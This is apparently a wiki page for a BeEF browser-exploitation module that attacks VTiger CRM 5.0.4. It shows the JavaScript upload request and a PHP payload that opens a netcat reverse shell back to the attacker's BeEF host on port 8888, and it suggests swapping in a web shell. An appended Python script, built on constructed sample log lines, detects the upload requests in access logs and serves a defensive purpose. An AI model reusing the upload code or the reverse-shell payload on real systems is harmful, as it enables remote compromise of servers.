Module: VTiger CRM Upload Exploit - h4sh5/beef GitHub Wiki

Summary

  • Objective: Exploits VTiger CRM 5.0.4 and uploads a reverse shell

  • Authors: wade, bm, pipes, xntrik, yorikv

  • Browsers: All

  • Code

Internal Working

Uploads a reverse shell PHP file via XMLHttpRequest.

var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';

//..

http_request.open("POST", targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
//...

The PHP payload that is uploaded and executed:

<?php passthru("/bin/nc -e /bin/sh '+beef_host+' 8888"); ?>

If /bin/nc is not installed on the target machine, this will not work. To start, you can try uploading a web shell instead of a reverse shell. The PHP code can be changed in <beef_path>/modules/exploits/vtiger_crm_upload_exploit/module.rb.
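For defenders, the upload request shown above leaves a recognisable entry in the web server's access log. The following is an added example, not part of the BeEF module or the original wiki page: it scans Combined Log Format lines for POSTs to the module=uploads / action=add2db endpoint. The log format, the sample lines, the host names and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD uri proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"'
)

def is_upload_request(method, uri):
    """POST to index.php with module=uploads and action=add2db, in any parameter order."""
    parts = urlsplit(uri)
    if method != "POST" or not parts.path.endswith("/index.php"):
        return False
    query = parse_qs(parts.query)
    # PHP keeps the last value of a repeated parameter, so compare against [-1].
    # Case-folding is a conservative choice here (assumption), not vTiger's documented behaviour.
    last = lambda name: query.get(name, [""])[-1].casefold()
    return last("module") == "uploads" and last("action") == "add2db"

def find_upload_posts(lines, site_host):
    """Return one dict per matching request; cross_origin is a triage hint, not proof."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_upload_request(m["method"], m["uri"]):
            referer_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
            hits.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                         "cross_origin": referer_host != site_host})
    return hits

# Constructed sample log lines (not real traffic); crm.example is a hypothetical CRM host.
UPLOAD = "/vtigercrm/index.php?module=uploads&action=add2db&return_module=Home&return_action=index"
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST {UPLOAD} HTTP/1.1" 200 512 '
    '"http://hooked.example/page.html" "Mozilla/5.0"',
    f'192.0.2.20 - - [10/Oct/2023:14:01:02 +0000] "POST {UPLOAD} HTTP/1.1" 200 498 '
    '"http://crm.example/vtigercrm/index.php?module=Home&action=index" "Mozilla/5.0"',
    '192.0.2.20 - - [10/Oct/2023:14:02:10 +0000] "GET /vtigercrm/index.php?module=Home'
    '&action=index HTTP/1.1" 200 7301 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:14:05:44 +0000] "POST /index.php?action=add2db'
    '&module=uploads HTTP/1.1" 302 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for hit in find_upload_posts(SAMPLE_LOG, "crm.example"):
        print(hit)
```

Because the request is sent by XMLHttpRequest from the hooked browser, the client IP in a hit is that browser's address, and a same-origin Referer does not rule the request out.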
